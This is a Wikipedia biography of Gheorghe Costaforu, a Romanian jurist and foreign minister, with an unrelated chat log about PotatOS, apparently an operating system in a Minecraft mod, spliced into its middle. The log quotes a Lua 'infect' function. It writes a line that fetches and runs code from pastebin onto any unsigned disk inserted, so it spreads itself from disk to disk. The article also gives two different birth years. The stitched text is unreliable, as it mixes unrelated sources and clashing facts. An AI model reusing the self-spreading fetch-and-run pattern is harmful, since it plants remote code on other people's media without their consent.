Gheorghe Costaforu

Gheorghe Costaforu (October 26, 1820 November 28, 1876) was a lawyer, university professor and Romanian politician who served as the Minister of Foreign Affairs.

Gheorghe Costaforu
Minister of Foreign Affairs
In office
March 11, 1871  April 27, 1873
MonarchCarol I of Romania
Preceded byNicolae Callimachi-Catargiu
Succeeded byVasile Boerescu
Personal details
Born(1816-10-26)October 26, 1816
Bucharest, Wallachia
DiedNovember 28, 1876(1876-11-28) (aged 60)
Bucharest, Romania
ChildrenConstantin Costa-Foru

Life and career

A graduate of Law School at Sorbonne University, Costaforu became the author of contemporary education system in Romania. He was one of the initiators of a large university palace complex construction at Bucharest University which was started in 1857. In 1864, he was appointed the university's first rector by decree of Alexandru Ioan Cuza, serving until 1871. From March 11, 1871 to April 27, 1873, Costa-Foru served as Minister of Foreign Affairs and in 1873, he was the Romanian envoy to Vienna.[1]

gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.
gollark: Basically, any disk you make *will not be run unsandboxed* on a regular potatOS install.

References

  1. Kellogg, Frederick (1984). The road to Romanian independence. West Lafayette, Indiana: Purdue University Press. p. 94. ISBN 1-55753-065-3. Retrieved 2010-09-20.


This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.